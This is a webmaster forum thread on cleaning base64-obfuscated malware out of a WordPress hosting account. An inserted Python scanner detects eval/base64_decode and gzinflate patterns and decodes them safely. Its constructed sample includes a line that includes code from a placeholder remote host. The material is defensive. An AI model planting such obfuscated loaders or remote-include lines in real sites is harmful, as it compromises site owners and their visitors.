Website Technology Issues Forum
Removing malicious lines of base 64 code
Malware in files, what to do, how to remove?
skibum
msg:4209470
 5:58 pm on Sep 30, 2010 (gmt 0)

So in a hosting account with a few WordPress installations, there are several files that have been injected with malicious code. The web host says I will need to remove the malicious lines of base 64 code and secure the account against future attacks. There is a list of probably at least 200 files. Many are in the wp-admin, wp-includes, wp-content/themes and a few others I created trying to learn php/mysql and understand all this stuff better.

Any suggestions on what to do or how to remedy this? This all might as well be written in Chinese as I have no idea what to do. I looked at a few of the files I created and nothing jumps out at me as being out of place, so I can't see any "malicious lines of base 64 code".

lammert
msg:4209700
 2:57 am on Oct 1, 2010 (gmt 0)

These lines shouldn't be too difficult to recognize. They all start with something like

eval(base64_decode('some string...

The more sophisticated versions use zip compression:

eval(stripslashes(gzinflate(base64_decode('some string ...

I had them a few months ago in a WordPress installation of a non-profit organization I host for. The lines were there right from the beginning, even before the site went live, and I therefore don't think they were injected, but part of a free theme they found somewhere. I didn't analyze it fully, but it seemed that part of the functionality of the theme was coming from an external server and that server delivered the malicious payload. The download code from that remote server was base64 encoded, to make it difficult to identify for the average website builder.

Rather than cleaning up the mess, I just disabled the use of WordPress, removed all files and pushed the user in the direction of another CMS.
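An added example (not from this thread or from WordPress) of how a site owner can find the two patterns lammert quotes and look at what they decode to without ever running them. It assumes Python's standard library only; the sample "theme file", its payloads and the host example.invalid are constructed stand-ins.

```python
import base64
import re
import zlib

# Matches eval(base64_decode('...')) and the zipped variant quoted above,
# eval(stripslashes(gzinflate(base64_decode('...')))). Group 1 says whether
# gzinflate is in the chain; group 2 is the base64 text.
PATTERN = re.compile(
    r"eval\s*\(\s*(?:stripslashes\s*\(\s*)?(gzinflate\s*\(\s*)?"
    r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]",
    re.IGNORECASE,
)
# Decoded code that fetches more code from another server (phranque's point).
REMOTE_RE = re.compile(r"(?:include|require|file_get_contents)\s*\(\s*['\"]https?://")

def decode_payload(b64: str, inflate: bool) -> str:
    """Decode statically, never eval(). PHP gzinflate() is raw DEFLATE (negative wbits)."""
    raw = base64.b64decode(re.sub(r"\s+", "", b64))
    if inflate:
        raw = zlib.decompress(raw, -zlib.MAX_WBITS)
    return raw.decode("utf-8", errors="replace")

def scan_php(source: str) -> list:
    """One finding per eval/base64 chain found in a PHP source string."""
    findings = []
    for m in PATTERN.finditer(source):
        inflate = m.group(1) is not None
        decoded = decode_payload(m.group(2), inflate)
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "gzinflate": inflate,
            "decoded": decoded,
            "remote_include": REMOTE_RE.search(decoded) is not None,
        })
    return findings

def _deflate(data: bytes) -> bytes:  # raw DEFLATE, what PHP's gzdeflate() emits
    c = zlib.compressobj(wbits=-zlib.MAX_WBITS)
    return c.compress(data) + c.flush()

# Constructed sample theme file with two injected lines. The payloads are
# harmless stand-ins; example.invalid is a placeholder host.
INNOCUOUS = b"echo 'hello';"
REMOTE = b"include('http://example.invalid/payload.txt');"
SAMPLE_THEME_FILE = (
    "<?php\nget_header();\n"
    f"eval(base64_decode('{base64.b64encode(INNOCUOUS).decode()}'));\n"
    "eval(stripslashes(gzinflate(base64_decode('"
    f"{base64.b64encode(_deflate(REMOTE)).decode()}'))));\n"
)
```

Run scan_php() over the contents of each file the host listed; a finding with remote_include set is the "payload delivered from an external server" case described above, and the file should be restored from a known-clean copy rather than edited by hand.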

phranque
msg:4211430
 7:24 am on Oct 5, 2010 (gmt 0)

you have to figure out where the vulnerability is to ultimately solve the problem.
for example, it could be that someone obtained your login credentials, or that another account on the shared server provided a back door, or that you installed a theme containing some "bad stuff", or that WP or a plugin has a vulnerability.

here are a few WebmasterWorld posts that may provide some clues.

Website HACKED - help!:
http://www.webmasterworld.com/webmaster/4042154.htm [webmasterworld.com]

I have a site hijacking my wordpress - can you help?:
http://www.webmasterworld.com/content_management/3830507.htm [webmasterworld.com]

30 day ban for cloaked outgoing links due to PHP hack:
http://www.webmasterworld.com/google/3823009.htm [webmasterworld.com]

skibum
msg:4211443
 7:44 am on Oct 5, 2010 (gmt 0)

Thanks! Was looking at the files noted by the host as having Base 64 code in them and could not find any strange code in a handful that were supposedly infected. Doubt I'll ever be able to figure out where the backdoor is if changing login credentials doesn't work but those threads add a few more things to run through to try to clean things up.

phranque
msg:4211515
 9:32 am on Oct 5, 2010 (gmt 0)

as was mentioned in one thread the payload could be dynamically included from an external server.
also note that the database may contain the encoded javascript and the php script is assembling that content on the fly.
